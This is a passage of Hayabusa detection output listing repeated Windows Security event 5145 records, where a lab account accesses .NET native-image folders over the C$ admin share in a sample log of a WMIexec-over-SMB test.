10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share 